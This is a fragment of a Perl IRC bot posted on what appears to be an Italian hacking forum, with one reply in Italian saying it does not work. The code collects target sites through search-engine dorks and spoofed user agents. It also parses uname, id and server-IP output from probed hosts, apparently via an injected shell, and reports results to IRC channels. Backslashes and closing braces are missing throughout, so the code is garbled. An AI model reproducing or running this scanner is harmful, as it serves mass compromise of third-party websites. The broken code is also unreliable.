#open( $nf, ">>", "netscape.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
return @list;

sub infospace(){
my @list;
my $key = $_[0];
my $name= $_[1];
for ($p = 0;$p <= 5; $p++) {
my $re = query("http://msxml.infospace.com/home/search/web/".key($key));
while ($re =~ m/rawto=http://(.*?)/g) {
my $k = $1;
if ($k !~ /infospace/) {
my @grep = links($k);
open( $filez, ">>", $name );
#open( $nf, ">>", "netscape.txt");
foreach my $k (@grep) {
print $filez "$kn";
#print $nf "$kn";
close $filez;
#close $nf;
push(@list, @grep);
return @list;


sub remove() { my $file = $_[0];system("rm $file"); }

sub clean () {
$dork = $_[0];
if ( $dork =~ /inurl:|allinurl:|intext:|allintext:|intitle:|allintitle:/ ) {
msg1("12[i]5 Cleaning Dork from Google Search Keys..");
$dork =~ s/^inurl://g;
$dork =~ s/^allinurl://g;
$dork =~ s/^intext://g;
$dork =~ s/^allintext://g;
$dork =~ s/^intitle://g;
$dork =~ s/^allintitle://g;
return $dork;

sub key() {
my $dork = $_[0];
$dork =~ s/ /+/g;
$dork =~ s/:/%3A/g;
$dork =~ s///%2F/g;
$dork =~ s/&/%26/g;
$dork =~ s/"/%22/g;
$dork =~ s/,/%2C/g;
$dork =~ s//%5C/g;
return $dork;

sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)/[^/]*$/1/;
$host =~ s/([-a-zA-Z0-9.]+)/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s//////g;
$hdir =~ s//////g;
$link =~ s//////g;
push( @l, $link, $host, $hdir );
return @l;

sub query() {
$link = $_[0];
my $req = HTTP::Request->new( GET => $link );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
return $response->content;

sub query1() {
my $url = $_[0];
my $host = $url;
my $query = $url;
$host =~ s/([-a-zA-Z0-9.]+)/.*/$1/;
$query =~ s/$host//;
eval {
$uagent = $user_agent[rand(scalar(@user_agent))];
my $sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || return;
print $sock "GET $query HTTP/1.0rnHost: $hostrnAccept: */*rnUser-Agent: ".$uagent."rnrn";
my @r = <$sock>;
$page = "@r";
return $page;

sub query2() {
$link = $_[0];
my $req = HTTP::Request->new( GET => $link );
my $ua = LWP::UserAgent->new();
my $response = $ua->request($req);
return $response->content;

sub os() {
my $site = $_[0];
my $ret = &query($site);
while ( $ret =~ m/<br>uname -a:(.+?)<br>/g ) { $un = $1; }
while ( $ret =~ m/<br>os:(.+?)<br>/g ) { $os = $1; }
while ( $ret =~ m/<br>id:(.+?)<br>/g ) { $id1 = $1; }
while ( $ret =~ m/<br>srvip:(.+?)<br>/g ) { $ip1 = $1; }
while ( $ret =~ m/<br>srvname:(.+?)<br>/g ) { $nm1 = $1; }
while ( $ret =~ m/<br>free:(.+?)<br>/g ) { $free = $1; }
while ( $ret =~ m/<br>used:(.+?)<br>/g ) { $used = $1; }
while ( $ret =~ m/<br>total:(.+?)<br>/g ) { $all = $1; }

sub unici() {
my @unici = ();
my %­visti = ();
#open($nf, ">>", "cleaned.txt");
foreach my $elemento(@_) {
$elemento =~ s//+///g;
next if $visti{$elemento}++;
push @unici, $elemento;
#print $nf "$elementorn";
#close ($nf);
return @unici;

sub uagent() {
my @ret = (
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/20060111 Firefox/",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv: Gecko/20060111 Firefox/",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv: Gecko/20060130 SeaMonkey/1.0",

sub msg1 () { my $isi = $_[0];print $sock "PRIVMSG $chan1 :$isin"; }
sub msg2 () { my $isi = $_[0];print $sock "PRIVMSG $chan2 :$isin"; }
sub msg3 () { my $isi = $_[0];print $sock "PRIVMSG $chan3 :$isin"; }
sub msgr () {
my $se = $_[0];
my $totr = $_[1];
my $clr = $_[2];
print $sock "PRIVMSG $chan1 :13,1 [$se]:15 $totr 0?13 $clr n";
sub priv1 () { my $isi = $_[0];print $sock "PRIVMSG $admin :$isin"; }
sub join1 () { my $isi = $_[0];print $sock "JOIN $isin"; }

## FeeLCoMz Community ##

El Mastino
view post Posted on 16/7/2011, 07:41

non funziona...il mio interprete di perl non fa uscire nulla
1 replies since 25/11/2010, 19:12   2920 views